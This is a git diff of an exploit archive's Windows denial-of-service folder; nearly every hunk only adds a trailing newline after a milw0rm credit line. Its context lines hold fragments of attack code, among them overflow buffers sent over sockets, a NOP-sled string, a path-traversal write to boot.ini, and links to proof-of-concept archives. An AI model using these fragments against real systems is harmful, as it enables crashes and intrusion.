a/platforms/windows/dos/42244.cpp +++ b/platforms/windows/dos/42244.cpp @@ -141,4 +141,4 @@ int main() { CloseHandle(hCompletionPort); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/42264.txt b/platforms/windows/dos/42264.txt index 55d5a75b7..e350e005f 100755 --- a/platforms/windows/dos/42264.txt +++ b/platforms/windows/dos/42264.txt @@ -159,4 +159,4 @@ ChildEBP RetAddr Args to Child Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42264.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42264.zip \ No newline at end of file diff --git a/platforms/windows/dos/4227.php b/platforms/windows/dos/4227.php index 3be833329..5746fabab 100755 --- a/platforms/windows/dos/4227.php +++ b/platforms/windows/dos/4227.php @@ -56,4 +56,4 @@ $res = imagepsloadfont($buff); echo "boom!!\n"; ?> -# milw0rm.com [2007-07-26] +# milw0rm.com [2007-07-26] \ No newline at end of file diff --git a/platforms/windows/dos/423.pl b/platforms/windows/dos/423.pl index 49b09ceaa..f228cc3cc 100755 --- a/platforms/windows/dos/423.pl +++ b/platforms/windows/dos/423.pl @@ -39,4 +39,4 @@ $i->autoflush(1); } close $i; -# milw0rm.com [2004-08-27] +# milw0rm.com [2004-08-27] \ No newline at end of file diff --git a/platforms/windows/dos/42337.html b/platforms/windows/dos/42337.html index de9ba711d..3d374e179 100755 --- a/platforms/windows/dos/42337.html +++ b/platforms/windows/dos/42337.html @@ -72,4 +72,4 @@ document.write("returned type: " & VarType(c)) document.write("<br>") document.write("returned value: " & c) -</script> +</script> \ No newline at end of file diff --git a/platforms/windows/dos/42338.cpp b/platforms/windows/dos/42338.cpp index ba06faf65..8d722d7b2 100755 --- a/platforms/windows/dos/42338.cpp +++ b/platforms/windows/dos/42338.cpp @@ -188,4 +188,4 @@ int main() { FREE(pInfo); return (iReturn); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/42411.py b/platforms/windows/dos/42411.py index 8b9fe2665..ece86ea55 100755 --- a/platforms/windows/dos/42411.py +++ b/platforms/windows/dos/42411.py @@ -52,4 +52,4 @@ try: print "[*] Done." except: - print "[-] Error connecting" + print "[-] Error connecting" \ No newline at end of file diff --git a/platforms/windows/dos/42464.html b/platforms/windows/dos/42464.html index f8317e88a..a2243f528 100755 --- a/platforms/windows/dos/42464.html +++ b/platforms/windows/dos/42464.html @@ -73,4 +73,4 @@ function trigger() { print(x); } -trigger(); +trigger(); \ No newline at end of file diff --git a/platforms/windows/dos/42472.html b/platforms/windows/dos/42472.html index b77e68620..8f5686779 100755 --- a/platforms/windows/dos/42472.html +++ b/platforms/windows/dos/42472.html @@ -42,4 +42,4 @@ class Child extends Parent { } }; -new Child(); +new Child(); \ No newline at end of file diff --git a/platforms/windows/dos/42477.html b/platforms/windows/dos/42477.html index b6ca6b6f1..66c5d8b1a 100755 --- a/platforms/windows/dos/42477.html +++ b/platforms/windows/dos/42477.html @@ -35,4 +35,4 @@ function f() { arguments.x; } -f(); +f(); \ No newline at end of file diff --git a/platforms/windows/dos/42480.txt b/platforms/windows/dos/42480.txt index 1ae93b2c6..9bba92b68 100755 --- a/platforms/windows/dos/42480.txt +++ b/platforms/windows/dos/42480.txt @@ -4,4 +4,4 @@ The attached fuzzed swf file causes the traits of an ActionScript object to be a Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42480.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42480.zip \ No newline at end of file diff --git a/platforms/windows/dos/42481.js b/platforms/windows/dos/42481.js index c37682942..35a89cebf 100755 --- a/platforms/windows/dos/42481.js +++ b/platforms/windows/dos/42481.js @@ -174,4 +174,4 @@ assertEquals(3, counter); print(g); assertEquals(true, g(deopt(g))); -assertEquals(4, counter); +assertEquals(4, counter); \ No newline at end of file diff --git a/platforms/windows/dos/4251.html b/platforms/windows/dos/4251.html index 73dcd4903..0ce451a04 100755 --- a/platforms/windows/dos/4251.html +++ b/platforms/windows/dos/4251.html @@ -28,4 +28,4 @@ www.Deltasecurity.ir End Sub </script> -# milw0rm.com [2007-07-31] +# milw0rm.com [2007-07-31] \ No newline at end of file diff --git a/platforms/windows/dos/427.c b/platforms/windows/dos/427.c index c496fdad0..e292531b9 100755 --- a/platforms/windows/dos/427.c +++ b/platforms/windows/dos/427.c @@ -242,4 +242,4 @@ void loginftp(SOCKET sockfd, char *user, char *pass) printf("[+] User %s logged in.\r\n", user); } -// milw0rm.com [2004-08-31] +// milw0rm.com [2004-08-31] \ No newline at end of file diff --git a/platforms/windows/dos/4272.c b/platforms/windows/dos/4272.c index 5ebfe0faa..763e16af9 100755 --- a/platforms/windows/dos/4272.c +++ b/platforms/windows/dos/4272.c @@ -425,4 +425,4 @@ int send_dos (int fd, unsigned long src_ip, unsigned long dst_ip, return(bytes); } -// milw0rm.com [2007-08-09] +// milw0rm.com [2007-08-09] \ No newline at end of file diff --git a/platforms/windows/dos/428.c b/platforms/windows/dos/428.c index 4a240e60e..d26e78eca 100755 --- a/platforms/windows/dos/428.c +++ b/platforms/windows/dos/428.c @@ -177,4 +177,4 @@ if(show==1) printf("<==\r\n%s<==\r\n",buffer); return j; } -// milw0rm.com [2004-08-31] +// milw0rm.com [2004-08-31] \ No newline at end of file diff --git a/platforms/windows/dos/4281.c b/platforms/windows/dos/4281.c index 42146e7a9..c3845da05 100755 --- a/platforms/windows/dos/4281.c +++ b/platforms/windows/dos/4281.c @@ -178,4 +178,4 @@ int main(int argc, char **argv) return 0; } -// milw0rm.com [2007-08-13] +// milw0rm.com [2007-08-13] \ No newline at end of file diff --git a/platforms/windows/dos/4285.c b/platforms/windows/dos/4285.c index d86011695..bd382e3d0 100755 --- a/platforms/windows/dos/4285.c +++ b/platforms/windows/dos/4285.c @@ -189,4 +189,4 @@ int main(int argc, char **argv) return 0; } -// milw0rm.com [2007-08-13] +// milw0rm.com [2007-08-13] \ No newline at end of file diff --git a/platforms/windows/dos/4288.c b/platforms/windows/dos/4288.c index ddd216afa..47e184ef9 100755 --- a/platforms/windows/dos/4288.c +++ b/platforms/windows/dos/4288.c @@ -102,4 +102,4 @@ int main(int argc, char **argv) return 0; } -// milw0rm.com [2007-08-14] +// milw0rm.com [2007-08-14] \ No newline at end of file diff --git a/platforms/windows/dos/4289.php b/platforms/windows/dos/4289.php index 68aa5c234..a8b2c24ac 100755 --- a/platforms/windows/dos/4289.php +++ b/platforms/windows/dos/4289.php @@ -38,4 +38,4 @@ fputs($link,"GET /chat.ghp?username=$A&password=$A&room=1&sex=2 HTTP/1.1\r\nHost echo "\nWell done!\n"; ?> -# milw0rm.com [2007-08-14] +# milw0rm.com [2007-08-14] \ No newline at end of file diff --git a/platforms/windows/dos/429.c b/platforms/windows/dos/429.c index 1ddb106dd..2bafe811a 100755 --- a/platforms/windows/dos/429.c +++ b/platforms/windows/dos/429.c @@ -266,4 +266,4 @@ u_long resolv(char *host) { } #endif -// milw0rm.com [2004-08-31] +// milw0rm.com [2004-08-31] \ No newline at end of file diff --git a/platforms/windows/dos/4294.pl b/platforms/windows/dos/4294.pl index 4c6ac80b0..21dc01d34 100755 --- a/platforms/windows/dos/4294.pl +++ b/platforms/windows/dos/4294.pl @@ -26,4 +26,4 @@ while(<$sock>) { print; } -# milw0rm.com [2007-08-18] +# milw0rm.com [2007-08-18] \ No newline at end of file diff --git a/platforms/windows/dos/4304.php b/platforms/windows/dos/4304.php index 019f5e2cf..a20097935 100755 --- a/platforms/windows/dos/4304.php +++ b/platforms/windows/dos/4304.php @@ -41,4 +41,4 @@ $get_EBP = str_repeat("\x44", 100); ntuser_getuserlist($buff.$get_EIP.$get_ESP.$get_EBP); ?> -# milw0rm.com [2007-08-23] +# milw0rm.com [2007-08-23] \ No newline at end of file diff --git a/platforms/windows/dos/4335.txt b/platforms/windows/dos/4335.txt index 27a6649f1..99673b59e 100755 --- a/platforms/windows/dos/4335.txt +++ b/platforms/windows/dos/4335.txt @@ -7,4 +7,4 @@ Yahoo! Messenger 8.1.0.413 (webcam) Remote Crash Exploit Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4335.rar (08292007-expyahoo.rar) -# milw0rm.com [2007-08-29] +# milw0rm.com [2007-08-29] \ No newline at end of file diff --git a/platforms/windows/dos/4337.c b/platforms/windows/dos/4337.c index 03513f7e9..d45ba495f 100755 --- a/platforms/windows/dos/4337.c +++ b/platforms/windows/dos/4337.c @@ -60,4 +60,4 @@ void usage(void) } -// milw0rm.com [2007-08-29] +// milw0rm.com [2007-08-29] \ No newline at end of file diff --git a/platforms/windows/dos/4344.php b/platforms/windows/dos/4344.php index 8ef51e8cf..8e0b01945 100755 --- a/platforms/windows/dos/4344.php +++ b/platforms/windows/dos/4344.php @@ -36,4 +36,4 @@ if (!$fp) {echo "[*]exploit succeeded...\n";} else {echo "[!]it seems not working...\n";} ?> -# milw0rm.com [2007-08-30] +# milw0rm.com [2007-08-30] \ No newline at end of file diff --git a/platforms/windows/dos/4369.html b/platforms/windows/dos/4369.html index ef3aff4c3..e622f49aa 100755 --- a/platforms/windows/dos/4369.html +++ b/platforms/windows/dos/4369.html @@ -58,4 +58,4 @@ </span></span> </code></pre> -# milw0rm.com [2007-09-06] +# milw0rm.com [2007-09-06] \ No newline at end of file diff --git a/platforms/windows/dos/4373.html b/platforms/windows/dos/4373.html index b3027e661..dfa4f9820 100755 --- a/platforms/windows/dos/4373.html +++ b/platforms/windows/dos/4373.html @@ -58,4 +58,4 @@ </span> </code></pre> -# milw0rm.com [2007-09-07] +# milw0rm.com [2007-09-07] \ No newline at end of file diff --git a/platforms/windows/dos/4375.txt b/platforms/windows/dos/4375.txt index df9d7cddb..b6460a391 100755 --- a/platforms/windows/dos/4375.txt +++ b/platforms/windows/dos/4375.txt @@ -2,4 +2,4 @@ BaoFeng2 Mps.dll Activex Multiple Remote Buffer Overflow PoC https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4375.zip (09082007-storm.zip) -# milw0rm.com [2007-09-08] +# milw0rm.com [2007-09-08] \ No newline at end of file diff --git a/platforms/windows/dos/4379.html b/platforms/windows/dos/4379.html index 9803f0289..50c193385 100755 --- a/platforms/windows/dos/4379.html +++ b/platforms/windows/dos/4379.html @@ -77,4 +77,4 @@ SQLServer.Start StartMode ,Server ,Login ,Password </script> </html> -# milw0rm.com [2007-09-08] +# milw0rm.com [2007-09-08] \ No newline at end of file diff --git a/platforms/windows/dos/4403.py b/platforms/windows/dos/4403.py index c93712988..c90a94604 100755 --- a/platforms/windows/dos/4403.py +++ b/platforms/windows/dos/4403.py @@ -61,4 +61,4 @@ s.close() print "DONE" -# milw0rm.com [2007-09-13] +# milw0rm.com [2007-09-13] \ No newline at end of file diff --git a/platforms/windows/dos/4409.html b/platforms/windows/dos/4409.html index f6fa772f2..32f48ba43 100755 --- a/platforms/windows/dos/4409.html +++ b/platforms/windows/dos/4409.html @@ -145,4 +145,4 @@ MFC42!CFileFind::FindFile+0x2b: 73d6cd7f 83f8ff cmp eax,0FFFFFFFFh [...] -# milw0rm.com [2007-09-14] +# milw0rm.com [2007-09-14] \ No newline at end of file diff --git a/platforms/windows/dos/4474.html b/platforms/windows/dos/4474.html index 69e4da278..23ebac127 100755 --- a/platforms/windows/dos/4474.html +++ b/platforms/windows/dos/4474.html @@ -40,4 +40,4 @@ </span></span> </code></pre> -# milw0rm.com [2007-10-01] +# milw0rm.com [2007-10-01] \ No newline at end of file diff --git a/platforms/windows/dos/4479.html b/platforms/windows/dos/4479.html index 02cc342c4..441220595 100755 --- a/platforms/windows/dos/4479.html +++ b/platforms/windows/dos/4479.html @@ -20,4 +20,4 @@ CLSetting.CreateNewFile "..\..\..\..\..\..\..\..\boot.ini" </script> </html> -# milw0rm.com [2007-10-01] +# milw0rm.com [2007-10-01] \ No newline at end of file diff --git a/platforms/windows/dos/4498.pl b/platforms/windows/dos/4498.pl index 05806a994..749694194 100755 --- a/platforms/windows/dos/4498.pl +++ b/platforms/windows/dos/4498.pl @@ -63,4 +63,4 @@ close($socket); print "[?] Mati Sudah!\n"; -# milw0rm.com [2007-10-07] +# milw0rm.com [2007-10-07] \ No newline at end of file diff --git a/platforms/windows/dos/4569.pl b/platforms/windows/dos/4569.pl index a68d98295..179662b77 100755 --- a/platforms/windows/dos/4569.pl +++ b/platforms/windows/dos/4569.pl @@ -107,4 +107,4 @@ if ( $socket = IO::Socket::INET->new( PeerAddr => "127.0.0.1", PeerPort => "2000 print($reply . "\n"); } -# milw0rm.com [2007-10-27] +# milw0rm.com [2007-10-27] \ No newline at end of file diff --git a/platforms/windows/dos/4610.html b/platforms/windows/dos/4610.html index 11518931f..acc0aa4c1 100755 --- a/platforms/windows/dos/4610.html +++ b/platforms/windows/dos/4610.html @@ -112,4 +112,4 @@ </span></span> </code></pre> -# milw0rm.com [2007-11-06] +# milw0rm.com [2007-11-06] \ No newline at end of file diff --git a/platforms/windows/dos/4613.html b/platforms/windows/dos/4613.html index dfef0dd2e..bcba182aa 100755 --- a/platforms/windows/dos/4613.html +++ b/platforms/windows/dos/4613.html @@ -15,4 +15,4 @@ <body onload="JavaScript: return Check();" /> </html> -# milw0rm.com [2007-11-08] +# milw0rm.com [2007-11-08] \ No newline at end of file diff --git a/platforms/windows/dos/463.c b/platforms/windows/dos/463.c index 6b66446d9..767efabcb 100755 --- a/platforms/windows/dos/463.c +++ b/platforms/windows/dos/463.c @@ -131,4 +131,4 @@ while(1) return 0; } -// milw0rm.com [2004-09-13] +// milw0rm.com [2004-09-13] \ No newline at end of file diff --git a/platforms/windows/dos/4682.c b/platforms/windows/dos/4682.c index ef7cd6e85..18bc3cb1a 100755 --- a/platforms/windows/dos/4682.c +++ b/platforms/windows/dos/4682.c @@ -572,4 +572,4 @@ void usage(void) printf("Proof of Concept by Hong Gil-Dong & Jeon Woo-chi \n"); } -// milw0rm.com [2007-11-29] +// milw0rm.com [2007-11-29] \ No newline at end of file diff --git a/platforms/windows/dos/4683.py b/platforms/windows/dos/4683.py index 4022715d9..d850a0196 100755 --- a/platforms/windows/dos/4683.py +++ b/platforms/windows/dos/4683.py @@ -41,4 +41,4 @@ print "[x] File successfully written." f.close() print "[x] Open test.au with RealPlayer 11." -# milw0rm.com [2007-12-01] +# milw0rm.com [2007-12-01] \ No newline at end of file diff --git a/platforms/windows/dos/4688.html b/platforms/windows/dos/4688.html index 66b285e0b..8970d0801 100755 --- a/platforms/windows/dos/4688.html +++ b/platforms/windows/dos/4688.html @@ -65,4 +65,4 @@ unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%"); </body> </html> -# milw0rm.com [2007-12-04] +# milw0rm.com [2007-12-04] \ No newline at end of file diff --git a/platforms/windows/dos/4716.html b/platforms/windows/dos/4716.html index 96b515964..90a34c09b 100755 --- a/platforms/windows/dos/4716.html +++ b/platforms/windows/dos/4716.html @@ -63,4 +63,4 @@ </span></span> </code></pre> -# milw0rm.com [2007-12-11] +# milw0rm.com [2007-12-11] \ No newline at end of file diff --git a/platforms/windows/dos/4717.py b/platforms/windows/dos/4717.py index 26b50568f..50873494b 100755 --- a/platforms/windows/dos/4717.py +++ b/platforms/windows/dos/4717.py @@ -22,4 +22,4 @@ try: except: print "Unable to connect. exiting." -# milw0rm.com [2007-12-11] +# milw0rm.com [2007-12-11] \ No newline at end of file diff --git a/platforms/windows/dos/474.sh b/platforms/windows/dos/474.sh index 2ddd48f9e..d257c53e3 100755 --- a/platforms/windows/dos/474.sh +++ b/platforms/windows/dos/474.sh @@ -91,4 +91,4 @@ printf "\xE6\xE7\xE8\xE9\xEA\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFF\xDA\x00"; printf "\x0C\x03\x01\x00\x02\x11\x03\x11\x00\x3F\x00\xF9\xFE\x8A\x28\xA0\x0F"; printf "\xFF\xD9"; -# milw0rm.com [2004-09-22] +# milw0rm.com [2004-09-22] \ No newline at end of file diff --git a/platforms/windows/dos/4742.py b/platforms/windows/dos/4742.py index 721132952..79a7e02cf 100755 --- a/platforms/windows/dos/4742.py +++ b/platforms/windows/dos/4742.py @@ -102,4 +102,4 @@ def multiserv(port1, port2): multiserv(21, 25700) -# milw0rm.com [2007-12-18] +# milw0rm.com [2007-12-18] \ No newline at end of file diff --git a/platforms/windows/dos/4748.php b/platforms/windows/dos/4748.php index 9672b339d..91da10638 100755 --- a/platforms/windows/dos/4748.php +++ b/platforms/windows/dos/4748.php @@ -28,4 +28,4 @@ $puf=str_repeat(0xff,0xfff); ?> -# milw0rm.com [2007-12-18] +# milw0rm.com [2007-12-18] \ No newline at end of file diff --git a/platforms/windows/dos/4757.txt b/platforms/windows/dos/4757.txt index 16ec65ef3..86b87d562 100755 --- a/platforms/windows/dos/4757.txt +++ b/platforms/windows/dos/4757.txt @@ -182,4 +182,4 @@ Credits: //////// Issue discovery and research: porkythepig Contact: porkythepig@anspi.pl -# milw0rm.com [2007-12-19] +# milw0rm.com [2007-12-19] \ No newline at end of file diff --git a/platforms/windows/dos/4801.html b/platforms/windows/dos/4801.html index 408fa8e19..7bb41a655 100755 --- a/platforms/windows/dos/4801.html +++ b/platforms/windows/dos/4801.html @@ -69,4 +69,4 @@ </span></span> </code></pre> -# milw0rm.com [2007-12-28] +# milw0rm.com [2007-12-28] \ No newline at end of file diff --git a/platforms/windows/dos/4829.html b/platforms/windows/dos/4829.html index 6364a38ef..0f4d1b1ca 100755 --- a/platforms/windows/dos/4829.html +++ b/platforms/windows/dos/4829.html @@ -35,4 +35,4 @@ Access violation when reading [00000000]... <a href="javascript:;" OnClick="crash()">Crash...</a> </pre> -# milw0rm.com [2008-01-02] +# milw0rm.com [2008-01-02] \ No newline at end of file diff --git a/platforms/windows/dos/4885.txt b/platforms/windows/dos/4885.txt index 3ac442744..b1fd01d76 100755 --- a/platforms/windows/dos/4885.txt +++ b/platforms/windows/dos/4885.txt @@ -87,4 +87,4 @@ No fix ####################################################################### -# milw0rm.com [2008-01-10] +# milw0rm.com [2008-01-10] \ No newline at end of file diff --git a/platforms/windows/dos/4911.c b/platforms/windows/dos/4911.c index 46a35fdda..ddb53bc7b 100755 --- a/platforms/windows/dos/4911.c +++ b/platforms/windows/dos/4911.c @@ -73,4 +73,4 @@ main (int argc, char **argv) return (EXIT_SUCCESS); } -// milw0rm.com [2008-01-15] +// milw0rm.com [2008-01-15] \ No newline at end of file diff --git a/platforms/windows/dos/4931.txt b/platforms/windows/dos/4931.txt index b4a3364e1..f4582ccb2 100755 --- a/platforms/windows/dos/4931.txt +++ b/platforms/windows/dos/4931.txt @@ -187,4 +187,4 @@ No fix ##################################################################################### -# milw0rm.com [2008-01-17] +# milw0rm.com [2008-01-17] \ No newline at end of file diff --git a/platforms/windows/dos/5036.pl b/platforms/windows/dos/5036.pl index 309b7b6e1..4faaf2722 100755 --- a/platforms/windows/dos/5036.pl +++ b/platforms/windows/dos/5036.pl @@ -36,4 +36,4 @@ $ftp->login($user, $pass); print "Poc Successfull\n"; $ftp->quit; -# milw0rm.com [2008-02-02] +# milw0rm.com [2008-02-02] \ No newline at end of file diff --git a/platforms/windows/dos/5043.html b/platforms/windows/dos/5043.html index 48d1730d5..b45a61860 100755 --- a/platforms/windows/dos/5043.html +++ b/platforms/windows/dos/5043.html @@ -44,4 +44,4 @@ obj[target]('http://'+tmp, 1); </script> -# milw0rm.com [2008-02-02] +# milw0rm.com [2008-02-02] \ No newline at end of file diff --git a/platforms/windows/dos/5044.pl b/platforms/windows/dos/5044.pl index 2052cb423..3d8330d2d 100755 --- a/platforms/windows/dos/5044.pl +++ b/platforms/windows/dos/5044.pl @@ -36,4 +36,4 @@ print "Buffer Overflow Successfull\n"; $ssh2->disconnect(); exit; -# milw0rm.com [2008-02-03] +# milw0rm.com [2008-02-03] \ No newline at end of file diff --git a/platforms/windows/dos/5063.pl b/platforms/windows/dos/5063.pl index ac8322c64..25d73805b 100755 --- a/platforms/windows/dos/5063.pl +++ b/platforms/windows/dos/5063.pl @@ -27,4 +27,4 @@ print "Credits:Securfrog"; #Btw , after the crash /*if not exploited ...*/ you wont be able to open Nero media player , it will constantly crash . -# milw0rm.com [2008-02-05] +# milw0rm.com [2008-02-05] \ No newline at end of file diff --git a/platforms/windows/dos/5067.pl b/platforms/windows/dos/5067.pl index 4699ba664..72befbec2 100755 --- a/platforms/windows/dos/5067.pl +++ b/platforms/windows/dos/5067.pl @@ -25,4 +25,4 @@ close($FILE); print "$file has been created \n"; print "Credits:Securfrog"; -# milw0rm.com [2008-02-05] +# milw0rm.com [2008-02-05] \ No newline at end of file diff --git a/platforms/windows/dos/5085.txt b/platforms/windows/dos/5085.txt index 026f6bcc6..12b78755d 100755 --- a/platforms/windows/dos/5085.txt +++ b/platforms/windows/dos/5085.txt @@ -81,4 +81,4 @@ print "$file has been created \n"; laurent gaffié laurent.gaffie{remove_this}[at]gmail[dot]com -# milw0rm.com [2008-02-08] +# milw0rm.com [2008-02-08] \ No newline at end of file diff --git a/platforms/windows/dos/5086.html b/platforms/windows/dos/5086.html index 078e6b6da..f831a7408 100755 --- a/platforms/windows/dos/5086.html +++ b/platforms/windows/dos/5086.html @@ -43,4 +43,4 @@ Greetz: p1mp4m.es(sky, pepepistola, elvispresley, patoruzu, musashi) </body> </html> -# milw0rm.com [2008-02-08] +# milw0rm.com [2008-02-08] \ No newline at end of file diff --git a/platforms/windows/dos/5110.txt b/platforms/windows/dos/5110.txt index 691239111..671b2a778 100755 --- a/platforms/windows/dos/5110.txt +++ b/platforms/windows/dos/5110.txt @@ -66,4 +66,4 @@ laurent gaffié laurent.gaffie{remove_this}[at]gmail[dot]com -# milw0rm.com [2008-02-13] +# milw0rm.com [2008-02-13] \ No newline at end of file diff --git a/platforms/windows/dos/5122.pl b/platforms/windows/dos/5122.pl index 7e7188353..2d2c29212 100755 --- a/platforms/windows/dos/5122.pl +++ b/platforms/windows/dos/5122.pl @@ -20,4 +20,4 @@ close($FILE); print "$file has been created \n"; print "Credits:Securfrog"; -# milw0rm.com [2008-02-14] +# milw0rm.com [2008-02-14] \ No newline at end of file diff --git a/platforms/windows/dos/5142.c b/platforms/windows/dos/5142.c index 5a2c30e87..fbe9e10bf 100755 --- a/platforms/windows/dos/5142.c +++ b/platforms/windows/dos/5142.c @@ -70,4 +70,4 @@ main (int argc, char **argv) return (EXIT_SUCCESS); } -// milw0rm.com [2008-02-18] +// milw0rm.com [2008-02-18] \ No newline at end of file diff --git a/platforms/windows/dos/5184.py b/platforms/windows/dos/5184.py index a34de750f..7ba05d5dc 100755 --- a/platforms/windows/dos/5184.py +++ b/platforms/windows/dos/5184.py @@ -25,4 +25,4 @@ for i in range (0,20): except: print "Unable to connect" -# milw0rm.com [2008-02-25] +# milw0rm.com [2008-02-25] \ No newline at end of file diff --git a/platforms/windows/dos/5201.txt b/platforms/windows/dos/5201.txt index 5c1ba959c..f85344d4c 100755 --- a/platforms/windows/dos/5201.txt +++ b/platforms/windows/dos/5201.txt @@ -19,4 +19,4 @@ Upon your death, everyone in the server will instantly execute the format string -LONGPOKE<ATOM> -# milw0rm.com [2008-02-28] +# milw0rm.com [2008-02-28] \ No newline at end of file diff --git a/platforms/windows/dos/5217.html b/platforms/windows/dos/5217.html index 2ec3e296a..74fa3c649 100755 --- a/platforms/windows/dos/5217.html +++ b/platforms/windows/dos/5217.html @@ -12,4 +12,4 @@ toolbar.GetPropertyById "" ,bof </script> </html> -# milw0rm.com [2008-03-06] +# milw0rm.com [2008-03-06] \ No newline at end of file diff --git a/platforms/windows/dos/5225.html b/platforms/windows/dos/5225.html index 89c225598..15fa49fdc 100755 --- a/platforms/windows/dos/5225.html +++ b/platforms/windows/dos/5225.html @@ -65,4 +65,4 @@ target1.SetUninstallName(str1); .text:10012296 --> -# milw0rm.com [2008-03-10] +# milw0rm.com [2008-03-10] \ No newline at end of file diff --git a/platforms/windows/dos/5235.py b/platforms/windows/dos/5235.py index 874207672..036a50fc4 100755 --- a/platforms/windows/dos/5235.py +++ b/platforms/windows/dos/5235.py @@ -90,4 +90,4 @@ else: print "[-] This probably means that is not vulnerable" s.close() -# milw0rm.com [2008-03-11] +# milw0rm.com [2008-03-11] \ No newline at end of file diff --git a/platforms/windows/dos/5261.py b/platforms/windows/dos/5261.py index 5a1fada69..781cbfe4b 100755 --- a/platforms/windows/dos/5261.py +++ b/platforms/windows/dos/5261.py @@ -17,4 +17,4 @@ fd.close(); print "RML FILE CREATED" -# milw0rm.com [2008-03-15] +# milw0rm.com [2008-03-15] \ No newline at end of file diff --git a/platforms/windows/dos/5270.pl b/platforms/windows/dos/5270.pl index 70c910a9e..a805fcfed 100755 --- a/platforms/windows/dos/5270.pl +++ b/platforms/windows/dos/5270.pl @@ -36,4 +36,4 @@ ftp.quit() print 'DosEd' #EoFF -# milw0rm.com [2008-03-17] +# milw0rm.com [2008-03-17] \ No newline at end of file diff --git a/platforms/windows/dos/5316.py b/platforms/windows/dos/5316.py index 3f3825621..cc2e4db81 100755 --- a/platforms/windows/dos/5316.py +++ b/platforms/windows/dos/5316.py @@ -21,4 +21,4 @@ mode = "netascii" muha = "\x00\x02" + filename + "\0" + mode + "\0" s.sendto(muha, (host, port)) -# milw0rm.com [2008-03-26] +# milw0rm.com [2008-03-26] \ No newline at end of file diff --git a/platforms/windows/dos/5321.txt b/platforms/windows/dos/5321.txt index 11b9200a5..950cf106d 100755 --- a/platforms/windows/dos/5321.txt +++ b/platforms/windows/dos/5321.txt @@ -14,4 +14,4 @@ Public Property Get aaabcdefghissssssaaaaaaaaaaaaaaaaaaaaaaaaaadaaaaaaaaaaaaaaaa End Property -# milw0rm.com [2008-03-30] +# milw0rm.com [2008-03-30] \ No newline at end of file diff --git a/platforms/windows/dos/5327.txt b/platforms/windows/dos/5327.txt index 4660fb577..f9c38e4d6 100755 --- a/platforms/windows/dos/5327.txt +++ b/platforms/windows/dos/5327.txt @@ -10,4 +10,4 @@ Download the file anywhere excluding on desktop and try to browse it with the Wi https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5327.doc (2008-Iron.Team.hack.the.planet.doc) -# milw0rm.com [2008-03-31] +# milw0rm.com [2008-03-31] \ No newline at end of file diff --git a/platforms/windows/dos/5341.pl b/platforms/windows/dos/5341.pl index 1b44763ff..df25c7623 100755 --- a/platforms/windows/dos/5341.pl +++ b/platforms/windows/dos/5341.pl @@ -37,4 +37,4 @@ sleep(6); close ($sock); print "\n++ NC and check if the victim is killed \r\n"; -# milw0rm.com [2008-04-01] +# milw0rm.com [2008-04-01] \ No newline at end of file diff --git a/platforms/windows/dos/5343.py b/platforms/windows/dos/5343.py index eb8fcc0aa..025c568b4 100755 --- a/platforms/windows/dos/5343.py +++ b/platforms/windows/dos/5343.py @@ -72,4 +72,4 @@ while 1: sleep(0.1) -# milw0rm.com [2008-04-02] +# milw0rm.com [2008-04-02] \ No newline at end of file diff --git a/platforms/windows/dos/5344.py b/platforms/windows/dos/5344.py index 06062e74b..aca2ca399 100755 --- a/platforms/windows/dos/5344.py +++ b/platforms/windows/dos/5344.py @@ -18,4 +18,4 @@ data=expl.recv(1024) print data expl.close() -# milw0rm.com [2008-04-02] +# milw0rm.com [2008-04-02] \ No newline at end of file diff --git a/platforms/windows/dos/5349.py b/platforms/windows/dos/5349.py index e21795350..a97af7dfc 100755 --- a/platforms/windows/dos/5349.py +++ b/platforms/windows/dos/5349.py @@ -28,4 +28,4 @@ except: print " -------------------------------------" print "\nAN ERROR OCCURS DURING FILE CREATION!" -# milw0rm.com [2008-04-03] +# milw0rm.com [2008-04-03] \ No newline at end of file diff --git a/platforms/windows/dos/5354.c b/platforms/windows/dos/5354.c index 986d6a2ab..bf1396b6b 100755 --- a/platforms/windows/dos/5354.c +++ b/platforms/windows/dos/5354.c @@ -100,4 +100,4 @@ int main(int argc, char *argv[]){ return 0; } -// milw0rm.com [2008-04-03] +// milw0rm.com [2008-04-03] \ No newline at end of file diff --git a/platforms/windows/dos/5396.txt b/platforms/windows/dos/5396.txt index c2f738e79..f050627a8 100755 --- a/platforms/windows/dos/5396.txt +++ b/platforms/windows/dos/5396.txt @@ -115,4 +115,4 @@ No fix ####################################################################### -# milw0rm.com [2008-04-07] +# milw0rm.com [2008-04-07] \ No newline at end of file diff --git a/platforms/windows/dos/5427.pl b/platforms/windows/dos/5427.pl index 3f3afd363..00d9fd770 100755 --- a/platforms/windows/dos/5427.pl +++ b/platforms/windows/dos/5427.pl @@ -27,4 +27,4 @@ print "Done.\n"; close($victim); exit; -# milw0rm.com [2008-04-11] +# milw0rm.com [2008-04-11] \ No newline at end of file diff --git a/platforms/windows/dos/5438.py b/platforms/windows/dos/5438.py index f2fa89b28..1eb66e915 100755 --- a/platforms/windows/dos/5438.py +++ b/platforms/windows/dos/5438.py @@ -37,4 +37,4 @@ s.send('XCWD ' +bafer+ '\r\n') s.close() print " [+] Gotovo! " -# milw0rm.com [2008-04-13] +# milw0rm.com [2008-04-13] \ No newline at end of file diff --git a/platforms/windows/dos/5453.pl b/platforms/windows/dos/5453.pl index 6b5f52a0d..3b8dffb3c 100755 --- a/platforms/windows/dos/5453.pl +++ b/platforms/windows/dos/5453.pl @@ -17,4 +17,4 @@ close($file); print "$file has been created \n"; -# milw0rm.com [2008-04-15] +# milw0rm.com [2008-04-15] \ No newline at end of file diff --git a/platforms/windows/dos/5455.py b/platforms/windows/dos/5455.py index 734b7b905..2bb026a3a 100755 --- a/platforms/windows/dos/5455.py +++ b/platforms/windows/dos/5455.py @@ -20,4 +20,4 @@ fileHandle = open ( 'movie.srt', 'w' ) fileHandle.write ( '1\n00:00:01,001 --> 00:00:05,099\n'+bafer ) 